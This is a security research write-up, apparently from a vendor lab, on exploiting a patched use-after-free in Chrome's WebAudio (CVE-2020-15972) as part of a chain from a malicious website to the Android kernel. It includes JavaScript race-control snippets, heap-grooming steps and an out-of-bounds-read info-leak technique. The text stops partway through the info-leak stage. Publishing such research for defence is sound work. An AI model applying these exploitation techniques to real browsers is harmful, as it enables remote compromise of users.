This is the last post of a series in which I exploit three bugs that can be used to form an exploit chain from visiting a malicious website in the beta version of Chrome 86 to gain arbitrary code execution in the Android kernel. The first part of the series about the kernel exploit can be found here and the second part about Chrome sandbox escape here.

In this post I’ll go through the exploitation of CVE-2020-15972, a use-after-free in the WebAudio component of Chrome. This is a bug collision that I reported in September 2020 as 1125635. I was told that it was a duplicate of 1115901, although no fix was in place when I reported the bug. The bug was fixed in release 86.0.4240.75 of Chrome in October. More details about the bug can be found in GHSL-2020-167. This vulnerability affected much of the stable version 85 of Chrome, but for the purpose of this exploit, I’ll use the beta version 86.0.4240.30 of Chrome because the sandbox escape bug only affected version 86 of Chrome in beta.

Exploiting this bug allows me to gain remote code execution in the renderer process of Chrome, which runs as an isolated process on Android and has significantly less privilege than Chrome itself, which has the full privilege of an Android app. In order to escalate privilege to that of an Android app and to be able to launch the kernel exploit, this vulnerability needs to be used in tandem with the sandbox escape vulnerability 1125614 (GHSL-2020-165), which is detailed in another post. As explained in that post, the exploit targets the 64 bit Chrome binary, but the same primitives are also available to 32 bit binaries, so it should be adaptable to the 32 bit binary with changes in object layout and heap spraying.

As with my previous post on WebAudio exploitation, I’ll assume that readers are familiar with some of the basics covered in my other post on Chrome UAF exploitation. Some of the basic concepts behind the WebAudio API can also be found here.

The vulnerability

Let’s first review a few concepts that are crucial to the understanding of the vulnerability and the exploit. I’ll start with audio graph. This is basically a graph that joins an audio source with a destination. Each node in the graph represents some processing that will be done to the result of the previous node. For example, the following javascript

let soundSource1 = audioContext.createConstantSource();

let convolver = audioContext.createConvolver();

soundSource1.connect(convolver).connect(audioContext.destination);



creates a simple audio graph that applies a convolution to the input to obtain the output. This is just a simple linear graph:

An audio graph can be somewhat more complicated with different branches, such as when the ChannelMergerNode is used:

let soundSource1 = audioContext.createConstantSource();

let merger = audioContext.createChannelMerger(2);

let soundSource2 = audioContext.createConstantSource();

let convolver = audioContext.createConvolver();

soundSource1.connect(convolver).connect(merger, 0, 0);

soundSource2.connect(merger, 0, 1);

merger.connect(audioContext.destination);



Here the audio graph consists of two branches as follows:

As audio processing is a computationally intensive task, it will be done on a separate audio thread so that the browser remains responsive. Audio inputs in WebAudio are processed in units of 128 frames, called “quantums.” Once a quantum has started processing, the whole quantum will have to be completed, which means that all nodes will have to process those 128 frames, even if some nodes got deleted and garbage collected by the main thread.
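To give a feel for how small a quantum is, here is a minimal sketch of the arithmetic. The 128-frame size comes from the text; the 44100 Hz sample rate is only an assumed example value, and the helper names are made up for illustration.

```javascript
// Render quantum size stated in the text.
const RENDER_QUANTUM_FRAMES = 128;

// Amount of audio (in milliseconds) covered by one quantum at a sample rate.
function quantumDurationMs(sampleRate) {
  return (RENDER_QUANTUM_FRAMES / sampleRate) * 1000;
}

// Number of quanta needed to render a buffer of the given length in frames.
function quantaNeeded(lengthInFrames) {
  return Math.ceil(lengthInFrames / RENDER_QUANTUM_FRAMES);
}

// Assumed example: one second of audio at 44.1 kHz.
console.log(quantumDurationMs(44100).toFixed(2)); // roughly 2.90 ms of audio per quantum
console.log(quantaNeeded(44100));                 // 345 quanta
```

Note that this is the amount of audio a quantum represents, not how long the audio thread takes to process it; an offline context can render faster than real time.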

    let soundSource1 = audioContext.createConstantSource();
    let convolver = audioContext.createConvolver();
    soundSource1.connect(convolver).connect(audioContext.destination);
    audioContext.startRendering(); //<-------- start processing the audio graph
    convolver = null;
    gc();

In the above case, convolver will actually not be deleted, because every node is holding a reference to the output node that it connects to. However, if we disconnect the node

    let soundSource1 = audioContext.createConstantSource();
    let convolver = audioContext.createConvolver();
    soundSource1.connect(convolver).connect(audioContext.destination);
    audioContext.startRendering(); //<-------- start processing the audio graph
    soundSource1.disconnect();
    convolver = null;
    gc();

then convolver may be deleted while the audio graph is still being processed. So how does a dead node carry on processing audio data? In WebAudio, an AudioNode is actually only an interface to javascript; the actual processing is handled by the AudioHandler that it owns. When an AudioNode is destroyed, it will check if a quantum is being processed at the moment, using the IsPullingAudioGraph function:

    void AudioNode::Dispose() {
      ...
      if (context()->IsPullingAudioGraph()) {
        context()->GetDeferredTaskHandler().AddRenderingOrphanHandler(
            std::move(handler_));
      }
      ...
    }

If a quantum is being processed, it’ll transfer ownership of the AudioHandler (handler_) to the deferred_task_handler_ that is owned by the AudioContext itself. The DeferredTaskHandler will then ensure that the AudioHandler stays alive until the processing of the quantum has finished, and then clean up the “orphaned” AudioHandler.





There is, however, an exception. If the javascript frame containing the audio graph got destroyed, for example, when the iframe containing the graph is destroyed, then DeferredTaskHandler will perform the clean up immediately while a quantum is still being processed by calling the ClearHandlersToBeDeleted function, which will remove the orphaned AudioHandler. This was not a problem because a mutex was used to stop ClearHandlersToBeDeleted from being called while a quantum is processing. The mutex, however, was removed in this commit, making it possible to delete the orphaned AudioHandler while they are still in use for audio processing, causing use-after-free.

Before the mutex is removed, the AudioHandler is protected:

After the mutex is removed, the AudioHandler can be removed while it is still processing:

Of course, in an actual situation, the processing of a single quantum by a ConvolverHandler would have finished too quickly, making it impossible to delete in time. While this can be solved by creating a large audio graph to increase the processing time (as the quantum then needs to be processed by many nodes), it would still be very hard to practically exploit this, as there would be very little control of when the AudioHandler is deleted and I could end up anywhere in the processing code while this happens.
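The ownership hand-off and the unguarded clean-up described in this section can be modeled with a small single-threaded sketch. The class and method names mirror the Chromium names quoted above, but the logic is a simplified assumption for illustration, not the actual implementation; in particular, the real mutex would block the caller, whereas here the guarded clean-up is simply left to the end of the quantum.

```javascript
// Stand-in for an AudioHandler; `freed` models the object having been deleted.
class Handler {
  constructor(name) { this.name = name; this.freed = false; }
  process() {
    if (this.freed) throw new Error(`use-after-free: ${this.name}`);
    return `${this.name} processed`;
  }
}

class DeferredTaskHandler {
  constructor(guarded) {
    this.guarded = guarded;        // true models the mutex that was later removed
    this.renderingOrphans = [];
    this.inQuantum = false;
  }
  addRenderingOrphanHandler(handler) { this.renderingOrphans.push(handler); }
  // Called when the frame that owns the graph is destroyed.
  clearHandlersToBeDeleted() {
    if (this.guarded && this.inQuantum) return; // wait for the quantum to finish
    this.freeOrphans();
  }
  freeOrphans() {
    for (const h of this.renderingOrphans) h.freed = true;
    this.renderingOrphans = [];
  }
  beginQuantum() { this.inQuantum = true; }
  endQuantum() { this.inQuantum = false; this.freeOrphans(); }
}

// One quantum during which the owning frame is torn down.
function renderWithTeardown(guarded) {
  const deferred = new DeferredTaskHandler(guarded);
  const convolver = new Handler('ConvolverHandler');
  deferred.beginQuantum();
  deferred.addRenderingOrphanHandler(convolver); // node disposed mid-quantum
  deferred.clearHandlersToBeDeleted();           // iframe removed mid-quantum
  try {
    const result = convolver.process();          // audio thread still uses it
    deferred.endQuantum();
    return result;
  } catch (e) {
    return e.message;
  }
}

console.log(renderWithTeardown(true));  // ConvolverHandler processed
console.log(renderWithTeardown(false)); // use-after-free: ConvolverHandler
```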

Controlling the race

To actually exploit the bug, I need to be able to control the race so that when the AudioHandler is deleted,

- I have control of what code the audio thread will be running with a free’d AudioHandler.
- I have a chance of replacing the free’d AudioHandler before that code is run.

To do this, I’ll use the AudioWorkletNode. The AudioWorkletNode is a special node that uses a user defined javascript for processing:

    await audioContext.audioWorklet.addModule('tear-down.js');
    let worklet;
    worklet = new AudioWorkletNode(audioContext, 'tear-down');
    let convolver = audioContext.createConvolver();
    soundSource.connect(worklet).connect(convolver).connect(audioContext.destination);

The above script will register an AudioWorkletNode that uses the tear-down.js script to process the audio input. I can simply make the script wait for an arbitrary amount of time to delay the processing:

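    // Busy-wait helper (an assumption: sleep is not defined in the original snippet).
    function sleep(ms) {
      const end = Date.now() + ms;
      while (Date.now() < end) {}
    }

    class AutoProcessor extends AudioWorkletProcessor {
      process (inputs, outputs, parameters) {
        sleep(5000);
        return true;
      }
    }

    registerProcessor('tear-down', AutoProcessor);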

As the processing of convolver runs after worklet, this gives me plenty of time to delete and replace the ConvolverNode. For example, if I do something like this in an iframe

    await audioContext.audioWorklet.addModule('tear-down.js');
    let worklet = new AudioWorkletNode(audioContext, 'tear-down');
    let convolver = audioContext.createConvolver();
    soundSource.connect(worklet).connect(convolver).connect(audioContext.destination);
    audioContext.startRendering();
    sleep(200);
    worklet.disconnect();
    convolver = null;
    gc();
    parent.removeFrame(); //<-------- Get parent frame to delete ourselves;

then convolver will be deleted while worklet is still running. (This is just an over-simplified version and would not reliably remove convolver, as convolver first needs to be deleted and then garbage collected before the iframe gets deleted, which usually means convolver needs to live in the scope of another function that does not call parent.removeFrame. I’ll use this as an example for simplicity.)

Another useful fact is that, when doing this, only nodes that are disconnected from all their inputs will be deleted, while nodes that remain connected to their inputs will be kept alive even after the iframe is removed, and only get deleted when the processing is finished:

    let convolver = audioContext.createConvolver();
    let gain = audioContext.createGain();
    soundSource.connect(worklet).connect(convolver).connect(gain).connect(audioContext.destination);
    audioContext.startRendering();
    sleep(200);
    convolver.disconnect();
    gain = null;
    gc();
    parent.removeFrame(); //<-------- Get parent frame to delete ourselves;

In this case, when worklet finishes processing, convolver will remain alive while gain will be gone. This will be very useful to control the lifetime of each individual node when writing the exploit.

Primitives of the vulnerability

Now let’s take a look at the possible locations where I may end up when the worklet node finishes processing. First, I’ll introduce a few additional concepts to help explain how an audio graph is processed. Each AudioHandler owns a list of inputs and outputs to the audio node.

    class MODULES_EXPORT AudioHandler : public ThreadSafeRefCounted<AudioHandler> {
      ...
      Vector<std::unique_ptr<AudioNodeInput>> inputs_;
      Vector<std::unique_ptr<AudioNodeOutput>> outputs_;

The AudioNodeInput (a subclass of AudioSummingJunction) also holds a list of the outputs that connect to it, which it does not own:

    class AudioSummingJunction {
      ...
      // m_renderingOutputs is a copy of m_outputs which will never be modified
      // during the graph rendering on the audio thread. This is the list which
      // is used by the rendering code.
      // Whenever m_outputs is modified, the context is told so it can later
      // update m_renderingOutputs from m_outputs at a safe time. Most of the
      // time, m_renderingOutputs is identical to m_outputs.
      // These raw pointers are safe. Owner of this AudioSummingJunction has
      // strong references to owners of these AudioNodeOutput.
      Vector<AudioNodeOutput*> rendering_outputs_;
    };

Similarly, the AudioNodeOutput keeps a list of AudioNodeInput that are connected to it.

    class MODULES_EXPORT AudioNodeOutput final {
      ...
      // This HashSet holds connection references. We must call
      // AudioNode::makeConnection when we add an AudioNodeInput to this, and must
      // call AudioNode::breakConnection() when we remove an AudioNodeInput from
      // this.
      HashSet<AudioNodeInput*> inputs_;

So in the following example, the ConvolverHandler owns one AudioNodeInput and one AudioNodeOutput, and the AudioNodeInput holds a reference to the AudioNodeOutput of worklet, while the AudioNodeOutput holds a reference to the AudioNodeInput of gain.

soundSource.connect(worklet).connect(convolver).connect(gain).connect(audioContext.destination);



When processing an audio graph, the code actually propagates backwards starting from the destination and calls AudioNodeInput::Pull, which will then call AudioNodeOutput::Pull for each of the outputs that connects to it. The AudioNodeOutput::Pull then calls AudioHandler::ProcessIfNecessary of the AudioHandler that owns it, which will in turn call AudioNodeInput::Pull for its input and propagates the call to the AudioHandler that connects to it. This continues until the source node, which has no input, is reached, and then the actual processing will start with a call to AudioHandler::Process. After AudioHandler::Process completed, it will return to AudioHandler::ProcessIfNecessary of the next AudioHandler via AudioNodeOutput::Pull->AudioNodeInput::Pull->AudioHandler::PullInputs->AudioHandler::ProcessIfNecessary, which will call AudioHandler::Process of the next AudioHandler. The following figure illustrates this with an example of two AudioHandler, with the lower one being an AudioWorkletNode:

In the figure, each large rectangle represents all the calls that are made with objects owned by an AudioHandler, with the smaller rectangles inside representing functions that are being called. The blue arrows represent control flow edges that jump from one AudioHandler to another. When triggering the use-after-free with an AudioWorkletHandler that waits for a long time, the relevant jump is the one after AudioHandler::Process is completed because at that point, the next AudioHandler would have been deleted and replaced. In the above diagram, the red region indicates calls that are made with objects that would have been deleted when the calls are made. At this point, the code will first return to AudioNodeOutput::Pull that is owned by the AudioWorkletHandler, right after the call to ProcessIfNecessary. The following is the code path that it will then follow, together with some possibilities for exploitation:

- When Process returns, it’ll first return to ProcessIfNecessary of the AudioWorkletHandler, and then AudioNodeOutput::Pull of the AudioNodeOutput that it owns. At this point, none of these objects are deleted (this corresponds to the part of the blue arrow after AudioHandler::Process in the grey box in the bottom left of the figure). If AudioNodeOutput::Pull is called from AudioNodeInput::Pull, rather than AudioNodeInput::SumAllConnections, then it will jump back to AudioHandler::PullInputs of a free’d AudioHandler, which means that inputs_ would have been deleted while the loop is still iterating.

- If the size of inputs_ in the previous point is one to start with, then the loop would simply exit and ProcessIfNecessary would continue from right after PullInputs:

      void AudioHandler::ProcessIfNecessary(uint32_t frames_to_process) {
        ...
        PullInputs(frames_to_process);
        ...
        bool silent_inputs = InputsAreSilent();
        if (silent_inputs && PropagatesSilence()) {
          SilenceOutputs();
          ProcessOnlyAudioParams(frames_to_process);
        } else {
          UnsilenceOutputs();
          Process(frames_to_process);
        }

  At this point, AudioHandler is already free’d. Depending on the outcome of InputsAreSilent, the virtual function PropagatesSilence or Process will be called.

- If the deleted AudioHandler in the previous point was replaced by another valid AudioHandler so that the virtual function calls did not crash, then ProcessIfNecessary will return to the calling AudioNodeOutput::Pull. Now because AudioNodeOutput and AudioHandler are of different sizes, it is possible to replace AudioHandler while the AudioNodeOutput that makes this AudioNodeOutput::Pull call is still free’d (the stack/registers still store the pointer to the free’d object, instead of the AudioNodeOutput of the replaced AudioHandler). The function AudioNodeOutput::Pull will then call Bus and return a pointer to an AudioBus object owned by this AudioNodeOutput. This means that the returned pointer also refers to a free’d object (an AudioBus), which can be replaced with controlled data. This, however, is only interesting in the path where AudioNodeOutput::Pull is called from AudioNodeInput::SumAllConnections, as the path via AudioNodeInput::Pull does not make use of the return value.

While point two can be used to hijack control flow by faking a vtable, this requires having an info leak to both defeat ASLR and to obtain a heap address for storing the fake vtable, so I’ll not be able to use it at this point. Point one can be very powerful as it potentially allows me to replace inputs_ with a Vector of pointers of any type, causing type confusion between AudioNodeInput and many possible types. A simple CodeQL query can be used to find possible types:

    from Field f, PointerType t, Type c
    where f.getType().getName().matches("Vector<%") and
      f.getType().(ClassTemplateInstantiation).getTemplateArgument(0) = t and
      t.refersTo(c)
    select f, c, f.getDeclaringType(), f.getLocation()

However, as the Pull function is rather complex and involves many dereferences, it is still not entirely clear how to proceed with this.

Getting an info leak (first attempt)

So let’s take a look at point three. When calling via SumAllConnections, the return value of output->Pull, which now points to free’d memory, is passed to SumFrom:

    void AudioNodeInput::SumAllConnections(scoped_refptr<AudioBus> summing_bus,
                                           uint32_t frames_to_process) {
      ...
      for (unsigned i = 0; i < NumberOfRenderingConnections(); ++i) {
        ...
        AudioBus* connection_bus = output->Pull(nullptr, frames_to_process);
        // Sum, with unity-gain.
        summing_bus->SumFrom(*connection_bus, interpretation);
      }
    }

Depending on the number of channels in summing_bus and connection_bus, various paths can be taken. The simplest path just calls AudioChannel::SumFrom

    void AudioBus::SumFrom(const AudioBus& source_bus,
                           ChannelInterpretation channel_interpretation) {
      ...
      if (number_of_source_channels == number_of_destination_channels) {
        for (unsigned i = 0; i < number_of_source_channels; ++i)
          Channel(i)->SumFrom(source_bus.Channel(i));
        return;
      }

and AudioChannel::SumFrom simply sums (or copies) the data in source_bus (connection_bus) into summing_bus, using the length of summing_bus

    void AudioChannel::SumFrom(const AudioChannel* source_channel) {
      ...
      if (IsSilent()) {
        CopyFrom(source_channel);
      } else {
        //Copies using the length of `summing_bus` (`length()`)
        vector_math::Vadd(Data(), 1, source_channel->Data(), 1, MutableData(), 1,
                          length());
      }
    }

So if I can make the free’d AudioNodeOutput return a Bus that is shorter than summing_bus, then I can get an out-of-bounds read. By arranging the heap, I can then use this to obtain an address to a vtable and/or a heap pointer, which will allow me to use the virtual function call primitive in point two to achieve remote code execution.
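The length mismatch can be illustrated with a toy model in which one flat Float32Array stands in for the heap and offsets stand in for pointers. The layout (a 47-sample source immediately followed by a neighbouring object) and the sumFrom helper are assumptions for illustration; padding and the real allocator are ignored.

```javascript
// One flat array plays the role of the heap.
const heap = new Float32Array(256);
const SOURCE_OFFSET = 0;
const SOURCE_LENGTH = 47;                       // short replacement bus
const NEIGHBOUR_OFFSET = SOURCE_OFFSET + SOURCE_LENGTH;

heap.fill(0.5, SOURCE_OFFSET, SOURCE_OFFSET + SOURCE_LENGTH); // legitimate samples
heap.fill(42, NEIGHBOUR_OFFSET, NEIGHBOUR_OFFSET + 8);        // adjacent object's data

// Models the Vadd call in AudioChannel::SumFrom: the element count comes from
// the destination only, and the source length is never consulted.
function sumFrom(dest, sourceOffset) {
  for (let i = 0; i < dest.length; i++) {
    dest[i] += heap[sourceOffset + i];
  }
}

const summingBus = new Float32Array(128);
sumFrom(summingBus, SOURCE_OFFSET);

console.log(summingBus[0]);   // 0.5, an in-bounds sample
console.log(summingBus[47]);  // 42, read from past the end of the source
```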

There are, however, a few problems. First, even if I can replace the free’d AudioNodeOutput, I still need to have a valid pointer to connection_bus that is a valid AudioBus. A simple way is to just replace AudioNodeOutput with another AudioNodeOutput that has a short Bus. Unfortunately, the Bus of all AudioNodeOutput are the same length (128), which makes sense, otherwise there will be out-of-bounds read/write all the time. Another possibility is that, since Bus is owned by AudioNodeOutput, I can just replace Bus while leaving AudioNodeOutput free’d. As the memory allocator used for allocating AudioNodeOutput and Bus, PartitionAlloc, is a bucket allocator and AudioNodeOutput is of size 104 while AudioBus is of size 32, by manipulating these two buckets separately, it is possible to replace Bus while leaving AudioNodeOutput free’d. While PartitionAlloc will garble up the first 8 bytes of a free’d object as an extra protection, this does not affect the pointer that AudioNodeOutput::Bus returns and so connection_bus will still be pointing to the object I use for replacement. If I replace Bus with one that has a short length, then I can get an info leak.
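The idea of replacing the Bus while leaving the AudioNodeOutput free’d relies on the two objects living in different size buckets. The sketch below is a toy bucket allocator, assuming one last-in-first-out freelist per exact size; the real PartitionAlloc is more involved, and only the sizes 104 and 32 come from the text.

```javascript
// Toy bucket allocator: one LIFO freelist per size. Addresses are plain integers.
class BucketAllocator {
  constructor() { this.freelists = new Map(); this.next = 0x1000; }
  alloc(size) {
    const list = this.freelists.get(size) || [];
    if (list.length > 0) return list.pop();   // reuse the most recently freed slot
    const addr = this.next;
    this.next += size;
    return addr;
  }
  free(addr, size) {
    if (!this.freelists.has(size)) this.freelists.set(size, []);
    this.freelists.get(size).push(addr);
  }
  isFree(addr, size) {
    return (this.freelists.get(size) || []).includes(addr);
  }
}

const OUTPUT_SIZE = 104;  // AudioNodeOutput, per the text
const BUS_SIZE = 32;      // AudioBus, per the text

const allocator = new BucketAllocator();
const output = allocator.alloc(OUTPUT_SIZE);
const bus = allocator.alloc(BUS_SIZE);

// Deleting the handler frees both objects.
allocator.free(bus, BUS_SIZE);
allocator.free(output, OUTPUT_SIZE);

// Allocating only from the 32-byte bucket reclaims the bus slot...
const replacementBus = allocator.alloc(BUS_SIZE);

console.log(replacementBus === bus);                 // true
// ...while the 104-byte slot of the output is still on its freelist.
console.log(allocator.isFree(output, OUTPUT_SIZE));  // true
```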

The question now is how to create an AudioBus with arbitrary length. Looking at various calls to AudioBus::Create, the one in ConvolverHandler::SetBuffer looks promising, as it can be reached easily from javascript by assigning the buffer field of a ConvolverNode. Unfortunately, the AudioBus that is created is only local and will be deleted when the function call finishes, making it rather difficult to use. In the end, the one in WebAudioBus::Initialize works better as it can be reached via the decodeAudioData function in javascript, with the length of the AudioBus that is created controlled by the size of the input ArrayBuffer (which contains some audio data). By using ffmpeg to create MP3 files of various lengths, I was able to use this function to create AudioBus objects with various lengths.

The next problem is more difficult to solve. Note that while I can cause an out-of-bounds read and have the result copied into the backing store of the summing_bus, there is no way I can read that data out, for a couple of reasons:

- In order to trigger the use-after-free, I need to delete the iframe that contains the audio graph, which means all the audio nodes will be out of reach when the out-of-bounds read happens and hence there is no way to retrieve the data in the summing_bus of an AudioNodeInput that belongs to that graph.

- If summing_bus is also free’d, then it may be possible to replace it with another AudioBus in an AudioNodeInput that I can still reach and then perhaps there will be a way to read off the data from the summing_bus in that AudioNodeInput. This, unfortunately, is not the case either, because summing_bus is not a raw pointer, but a scoped_refptr that shares its ownership.

      void AudioNodeInput::SumAllConnections(scoped_refptr<AudioBus> summing_bus,
                                             uint32_t frames_to_process) {
        ...
        for (unsigned i = 0; i < NumberOfRenderingConnections(); ++i) {
          ...
          summing_bus->SumFrom(*connection_bus, interpretation);
        }
      }

This means that, even though everything is free’d by now, summing_bus will be kept alive until at least the SumAllConnections call is finished, so there is no way to replace summing_bus with something that I can still reach from another frame.

The runaway graph



It’s time to take another look at the iterator invalidation primitive in point one of the previous section. As mentioned before, by putting an AudioNode that takes multiple inputs, such as the ChannelMergerNode, after an AudioWorkletNode and then deleting the iframe that contains the audio graph to trigger the use-after-free bug, the ChannelMergerNode, and hence inputs_, will be deleted while the loop in AudioHandler::PullInputs is still iterating:

    void AudioHandler::PullInputs(uint32_t frames_to_process) {
      ...
      for (auto& input : inputs_)
        input->Pull(nullptr, frames_to_process);
    }

In practice, this means that after finishing the input->Pull call, the input iterator will be incremented and point to the next location in the free’d backing store of the now deleted inputs_. This will continue until it reaches the length of the original inputs_. So by allocating another Vector of the same size as inputs_, I can replace the free’d backing store with the backing store of the new Vector. While this can be used to cause type confusion and call AudioNodeInput::Pull on many different types of objects, it’s not obvious what object I should use to replace the AudioNodeInput.
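The effect of the loop continuing over a reclaimed backing store can be sketched with a small model. Here a `memory.backingStore` slot stands in for the address the loop keeps reading from, and the input names are made up; this is an illustration of the iteration pattern under those assumptions, not of the real memory layout.

```javascript
// Each input only records that it was pulled.
const pulled = [];
const makeInput = (name) => ({ pull: () => pulled.push(name) });

// The "address" that holds the backing store of inputs_.
const memory = { backingStore: [makeInput('child:in0'), makeInput('child:in1')] };

// Backing store of a node in the parent frame, same length as the child's.
const parentStore = [makeInput('parent:in0'), makeInput('parent:in1')];

// Models the range-for in AudioHandler::PullInputs: the element count is fixed
// when the loop starts, but each element is re-read from memory.
function pullInputs(onAfterPull) {
  const count = memory.backingStore.length;
  for (let i = 0; i < count; i++) {
    memory.backingStore[i].pull();
    onAfterPull(i);
  }
}

pullInputs((i) => {
  // During the first Pull the iframe is removed and the freed backing store
  // is reclaimed by the parent's vector.
  if (i === 0) memory.backingStore = parentStore;
});

console.log(pulled); // [ 'child:in0', 'parent:in1' ]
```

The second iteration ends up pulling an input that belongs to a different graph, which is the behaviour the next paragraphs build on.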



Instead, I’m just going to stick to the principle of small iteration in software development and replace it with something so trivial that it hardly does anything. I’m going to just replace the ChannelMergerNode with another ChannelMergerNode that lives on an audio graph in the parent frame. So when the bug triggers, it will just carry on running another audio graph that lives in the parent frame.



The following figure shows what happens with this object replacement:

The dash borders and edges indicate nodes and edges that would have been run if the child iframe is not deleted, whereas the green nodes indicate the nodes that are actually run. After processing the top branch in the child iframe, the frame gets deleted and the ChannelMergerNode is replaced with the one in the parent frame. This leads to the bottom branch of the audio graph in the parent frame being run instead.

So what can I gain from this? I’m just running an audio graph from the parent frame, which I can do directly from the parent frame by calling the startRendering function.

The answer is what happens when I delete an AudioNode. As explained earlier on, when an AudioNode gets garbage collected, to prevent the underlying AudioHandler from being deleted while it is still in use for processing the audio graph, the AudioNode will check whether the audio graph it belongs to is being processed by calling the IsPullingAudioGraph method of the AudioContext:

    void AudioNode::Dispose() {
      ...
      if (context()->IsPullingAudioGraph()) {
        context()->GetDeferredTaskHandler().AddRenderingOrphanHandler(
            std::move(handler_));
      }

This simply checks whether the audio graph is in a kRunning state

    bool OfflineAudioContext::IsPullingAudioGraph() const {
      ...
      return ContextState() == BaseAudioContext::kRunning;
    }

and transfers the ownership of the AudioHandler if it is. In this case, however, because the audio graph in the parent frame is being processed as part of the graph in the child frame, the audio graph would not have been in a kRunning state because it has not been started from the parent frame. (In the actual exploit, I had to start and then suspend the graph to get the nodes to connect to each other, but that makes no difference as the graph would then be in a kSuspended state, so IsPullingAudioGraph will still return false.) This means that the ownership transfer of the AudioHandler would not happen and it will just be deleted while the graph is being processed.

In particular, this means that I can cause the same type of use-after-free in this graph without having to delete the frame that contains it. This is important, because the main problem when trying to get an info leak before was that all the nodes were removed with the iframe that contains them and so there was no way to retrieve the leaked data. But now that I can cause the use-after-free without deleting the frame that contains the nodes, I will be able to access them after the use-after-free is triggered and be able to read the leaked data.

Getting an info leak (for real)

The following steps can now be used to get an info leak.

- Trigger the use-after-free bug in a child



iframeand use the loop iterator invalidation primitive to cause a branch of an audio graph to run in the parent frame:

The above figure shows the actual graph that I’ll use for replacement. It consists of two ScriptProcessorNode sandwiching a GainNode. The ScriptProcessorNode is like the AudioWorkletNode, which allows user supplied scripts to be run for processing audio data. However, in the case of ScriptProcessorNode, the script is run in the context of the dom window, which allows me to access the AudioContext and various nodes. This makes it easier to use ScriptProcessorNode for the exploit and I’ll use this instead of AudioWorkletNode in the parent frame graph.



- In the audio processing script of the

ScriptProcessorNodescript2, remove theGainNodethat follows it and garbage collect it, so that itsAudioInputNodeandAudioOutputNode, are free’d.



To construct the info leak, I’ll also need to replace the deleted GainNode to prevent the virtual function calls from crashing, while leaving its AudioNodeOutput free’d. I can do this by manipulating the heap to create extra free’d AudioNodeOutput so that when the GainNode is free’d, its AudioNodeOutput won’t be at the head of the free list and won’t be replaced. I do this by creating an extra ChannelMergerNode:

    function createSource() {
      let s = audioCtx.createChannelMerger(3);
    }

    //The audio processor of the first ScriptProcessorNode
    function scriptProcess2(audioProcessingEvent) {
      //Needed for creating holes for AudioNodeOutput, so they don't get reclaimed
      createSource();
      ...
      script2.disconnect(); //<--- remove reference to the `GainNode`
      gc(); //<--- first deletes `GainNode`, then `ChannelMergerNode` created in `createSource`.
      //Needs to wait for the small objects allocated by GC to clear
      sleep(4000);
      let gain = audioCtx2.createGain(); //<---- replace gain to get virtual function calls through
      let src0 = audioCtx2.createChannelMerger(1); //<--- To arrange heap for AudioBus
      ...
    }

While the call to createSource may look redundant, remember that the ChannelMergerNode created in createSource does not get removed until garbage collection, and at that point, it will actually be removed after the GainNode, leaving an extra AudioNodeOutput at the head of the freelist.

Then when the deleted GainNode is replaced with another GainNode, the free’d AudioNodeOutput of the old GainNode will not be occupied. This free’d AudioNodeOutput will then be responsible for calling Bus and provide us with a free’d AudioBus.
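The ordering argument can be sketched with a single freelist, assuming it behaves as a last-in-first-out stack as the phrase "head of the freelist" suggests. The slot labels are made up for illustration.

```javascript
// LIFO freelist for one bucket (the AudioNodeOutput size class).
const freelist = [];
const freeSlot = (slot) => freelist.push(slot);
const allocSlot = () => freelist.pop();

// Order of frees during garbage collection, as described above.
freeSlot('output of old GainNode');       // freed first
freeSlot('output of spare merger');       // freed later, so it sits at the head

// Creating the replacement GainNode allocates one AudioNodeOutput.
const reused = allocSlot();

console.log(reused);                                       // output of spare merger
console.log(freelist.includes('output of old GainNode'));  // true, still free'd
```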

In the figure, green arrows indicate objects that are free’d when another object is deleted and red arrows indicate objects that are created.

To replace the AudioBus owned by the AudioNodeOutput, which is of size 32, the bucket of size 32 also needs to be manipulated. I again use another ChannelMergerNode for this purpose.

At the same time, care must also be taken to not replace the AudioNodeOutput of the deleted GainNode…

While there are many requirements to meet and AudioBus is allocated from a rather noisy bucket, unlike in other situations where the heap is often shared by other processes that are not in our control, the renderer is very much an isolated process that owns its heap exclusively. As such, renderer heap spray can be done in a very precise and specific manner as long as the script is run from a fresh renderer (which would be the case when clicking a link from a logged-in context, such as via email or Twitter), so this does not cause too much of a reliability issue for the exploit.

Once the heap is put into the correct state so that the AudioBus owned by the now deleted GainNode is at the correct position of the freelist, the AudioContext::decodeAudioData function can be used to create an AudioBus of appropriate length to trigger the out-of-bounds read. This function takes an ArrayBuffer of an audio file (e.g. mp3, ogg) and decodes it in a background thread. It’ll create an AudioBus that has the appropriate length to hold the decoded results:

    void AsyncAudioDecoder::DecodeOnBackgroundThread(
        DOMArrayBuffer* audio_data,
        float sample_rate,
        V8DecodeSuccessCallback* success_callback,
        V8DecodeErrorCallback* error_callback,
        ScriptPromiseResolver* resolver,
        BaseAudioContext* context,
        scoped_refptr<base::SingleThreadTaskRunner> task_runner) {
      ...
      scoped_refptr<AudioBus> bus = CreateBusFromInMemoryAudioFile(
          audio_data->Data(), audio_data->ByteLength(), false, sample_rate); //<----- AudioBus created here
      ...
      if (context) {
        PostCrossThreadTask(
            *task_runner, FROM_HERE,
            CrossThreadBindOnce(&AsyncAudioDecoder::NotifyComplete,
                                WrapCrossThreadPersistent(audio_data),
                                WrapCrossThreadPersistent(success_callback),
                                WrapCrossThreadPersistent(error_callback),
                                WTF::RetainedRef(std::move(bus)), //<------ passed to `NotifyComplete`
                                WrapCrossThreadPersistent(resolver),
                                WrapCrossThreadPersistent(context)));
      }
    }

The created AudioBus is then passed to NotifyComplete as a task on the main thread, and is deleted when NotifyComplete is finished:

    void AsyncAudioDecoder::NotifyComplete(
        DOMArrayBuffer*,
        V8DecodeSuccessCallback* success_callback,
        V8DecodeErrorCallback* error_callback,
        AudioBus* audio_bus,
        ScriptPromiseResolver* resolver,
        BaseAudioContext* context) {
      ...
      AudioBuffer* audio_buffer = AudioBuffer::CreateFromAudioBus(audio_bus);
      // If the context is available, let the context finish the notification.
      if (context) {
        context->HandleDecodeAudioData(audio_buffer, resolver, success_callback,
                                       error_callback);
      }
    }

As AudioBus is only a temporary object here, and will be deleted when the decoding is finished, I need to make sure that it lives long enough for the out-of-bounds read to happen. In order to do this, I can use the setInterval javascript function to jam the task queue. When setInterval is called, it creates a delayed task. This task, as well as the NotifyComplete task posted by DecodeOnBackgroundThread, are posted to the same task queue for execution on the main thread. By creating tasks with setInterval, I can cause delays in NotifyComplete being run because any task posted before NotifyComplete will have to be run before NotifyComplete, and they both have to run on the main thread. This will allow me to keep the AudioBus alive for a long enough time so that when AudioNodeInput::SumAllConnections which causes the out-of-bounds read is using this AudioBus in the audio thread, it will still be alive.
